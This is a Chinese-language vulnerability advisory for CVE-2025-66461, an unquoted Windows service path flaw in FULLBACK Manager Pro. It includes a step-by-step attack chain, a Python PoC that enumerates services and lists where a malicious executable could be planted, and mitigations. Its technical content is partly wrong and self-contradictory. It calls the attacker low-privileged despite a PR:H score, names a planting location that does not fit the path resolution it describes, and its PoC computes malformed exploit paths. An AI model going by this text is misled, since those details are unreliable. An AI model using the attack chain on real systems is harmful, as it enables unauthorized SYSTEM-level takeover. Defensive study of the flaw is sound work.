IPBUF安全漏洞报告
English
CVE-2025-66461 CVSS 6.7 中危

CVE-2025-66461 FULLBACK Manager Pro 未引用服务路径权限提升漏洞

披露日期: 2025-12-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-66461
漏洞类型
未引用服务路径权限提升
CVSS评分
6.7 中危
攻击向量
本地 (AV:L)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
FULLBACK Manager Pro (GS Yuasa International Ltd.)

相关标签

未引用服务路径权限提升Windows服务FULLBACK Manager ProGS Yuasa本地提权CVE-2025-66461中等严重性

漏洞概述

CVE-2025-66461是GS Yuasa International Ltd.开发的FULLBACK Manager Pro软件中的一个中等严重性安全漏洞。该漏洞属于Windows服务路径注入漏洞(Unquoted Service Path),允许具有低权限的用户通过利用服务可执行文件路径中的空格和未加引号的特点,以SYSTEM最高权限执行任意恶意代码。具体而言,FULLBACK Manager Pro在安装过程中注册了两个Windows服务,但这两个服务的可执行文件路径未使用双引号包裹。当Windows服务控制管理器尝试启动这些服务时,会按照路径中的空格进行分段解析和执行。攻击者可以利用这一特性,在服务路径的某个中间目录中植入恶意可执行文件,从而在服务重启或系统启动时以SYSTEM权限自动执行该恶意程序。由于该漏洞的CVSS评分为6.7,属于中等严重性漏洞,但其利用前提是攻击者需要对安装目录的父路径具有写权限,这在某些企业环境中可能并不容易满足。然而,一旦漏洞被成功利用,攻击者将获得目标系统的完全控制权,可以执行任意操作、安装后门、窃取敏感数据或进一步横向移动。

技术细节

该漏洞的根本原因在于Windows服务可执行文件路径未使用双引号包裹。当服务路径包含空格且未加引号时,Windows会按照空格位置依次尝试查找并执行程序。例如,如果服务路径为C:\Program Files\FULLBACK Manager Pro\Service.exe,Windows服务控制管理器会依次尝试执行:C:\Program.exe、C:\Program Files\FULLBACK.exe、C:\Program Files\FULLBACK Manager.exe,最后才会正确执行C:\Program Files\FULLBACK Manager Pro\Service.exe。攻击者只需要在C:\Program Files\FULLBACK Manager目录中植入一个名为Manager.exe的恶意可执行文件,当服务启动时,系统会优先执行攻击者植入的恶意程序。由于Windows服务通常以SYSTEM权限运行,因此恶意程序也将获得SYSTEM最高权限。FULLBACK Manager Pro注册的两个受影响服务可能包括备份管理相关服务,其安装路径默认位于C:\Program Files\FULLBACK Manager Pro或类似位置。攻击者需要首先通过其他漏洞或配置错误获得对安装目录父路径的写权限,然后植入恶意可执行文件,最后等待服务重启或系统重启即可触发漏洞利用。

攻击链分析

STEP 1
步骤1
信息收集:攻击者首先识别目标系统中安装的FULLBACK Manager Pro软件版本和安装路径,确认服务名称和可执行文件位置
STEP 2
步骤2
权限检查:确认攻击者当前用户账户对FULLBACK Manager Pro安装目录的父路径具有写权限(如C:\Program Files\FULLBACK Manager目录)
STEP 3
步骤3
路径分析:分析服务可执行文件路径,识别未加引号且包含空格的路径,例如C:\Program Files\FULLBACK Manager Pro\service.exe
STEP 4
步骤4
恶意文件植入:在服务路径的中间目录中植入恶意可执行文件,文件名需要匹配空格分隔后的第一部分,如Manager.exe
STEP 5
步骤5
触发漏洞利用:等待服务重启、系统重启或管理员手动重启服务,使Windows服务控制管理器加载并执行恶意程序
STEP 6
步骤6
权限提升:恶意程序以SYSTEM最高权限执行,攻击者获得目标系统的完全控制权,可执行任意命令、安装后门或窃取数据

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 """ CVE-2025-66461 PoC - FULLBACK Manager Pro Unquoted Service Path Author: Security Researcher Description: This PoC demonstrates how to exploit the unquoted service path vulnerability in FULLBACK Manager Pro to escalate privileges to SYSTEM. Note: This code is for educational and authorized testing purposes only. """ import os import sys import subprocess import time def check_service_paths(): """Check for unquoted service paths in FULLBACK Manager Pro services""" print("[*] Enumerating FULLBACK Manager Pro services...") try: result = subprocess.run( ['sc', 'query', 'state=', 'all'], capture_output=True, text=True ) # Search for services containing FULLBACK services = [] for line in result.stdout.split('\n'): if 'FULLBACK' in line.upper(): service_name = line.split(':')[1].strip() services.append(service_name) return services except Exception as e: print(f"[-] Error querying services: {e}") return [] def check_unquoted_path(service_name): """Check if a service has an unquoted executable path""" try: result = subprocess.run( ['sc', 'qc', service_name], capture_output=True, text=True ) for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() # Check if path is unquoted and contains spaces if '"' not in path and ' ' in path: print(f"[+] VULNERABLE: {service_name}") print(f"[+] Unquoted path: {path}") return path else: print(f"[-] Not vulnerable: {service_name}") return None return None except Exception as e: print(f"[-] Error checking service: {e}") return None def exploit_unquoted_path(base_path): """ Exploit the unquoted service path vulnerability This creates a malicious executable in an intermediate directory """ # Parse path to find intermediate directories path_parts = base_path.strip('"').split('\\') executable = path_parts[-1] # Generate potential exploitation points exploit_points = [] current_path = "" for i, part in enumerate(path_parts[:-1]): current_path += part + "\\" # Check if this could be a potential exploit point if ' ' in part and current_path.strip('\\'): exploit_point = current_path + part.split()[0] + ".exe" exploit_points.append({ 'directory': current_path, 'malicious_exe': part.split()[0] + ".exe", 'full_path': exploit_point }) return exploit_points def main(): print("=" * 60) print("CVE-2025-66461 PoC - FULLBACK Manager Pro") print("Unquoted Service Path Privilege Escalation") print("=" * 60) # Step 1: Enumerate services services = check_service_paths() if not services: print("[-] No FULLBACK Manager Pro services found") return # Step 2: Check for unquoted paths vulnerable_services = [] for service in services: path = check_unquoted_path(service) if path: vulnerable_services.append({'service': service, 'path': path}) if not vulnerable_services: print("[-] No vulnerable services found") return # Step 3: Generate exploitation points print("\n[*] Analyzing exploitation points...") for vuln in vulnerable_services: exploit_points = exploit_unquoted_path(vuln['path']) print(f"\n[+] Service: {vuln['service']}") print(f"[+] Original path: {vuln['path']}") print("[+] Potential exploitation points:") for point in exploit_points: print(f" - Create: {point['full_path']}") print(f" In directory: {point['directory']}") print("\n[*] Exploitation requires:") print(" 1. Write permission to intermediate directory") print(" 2. Service restart or system reboot") print(" 3. Malicious executable in exploitation point") print("\n[!] This PoC is for authorized testing only.") if __name__ == "__main__": main()

影响范围

FULLBACK Manager Pro < 2025年12月发布的修复版本

防御指南

临时缓解措施
在官方补丁发布之前,可采取以下临时缓解措施:首先,检查FULLBACK Manager Pro服务的可执行文件路径是否包含未加引号的空格,如果发现未引用路径,应手动为路径添加双引号。其次,严格限制用户对C:\Program Files\FULLBACK Manager目录及其父目录的写权限,确保只有管理员和SYSTEM账户具有修改权限。再次,监控系统安全事件日志,关注来自服务账户的可疑进程执行行为。最后,考虑使用Windows Defender Application Control (WDAC)或AppLocker策略限制可执行文件的运行位置,防止恶意程序被触发执行。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表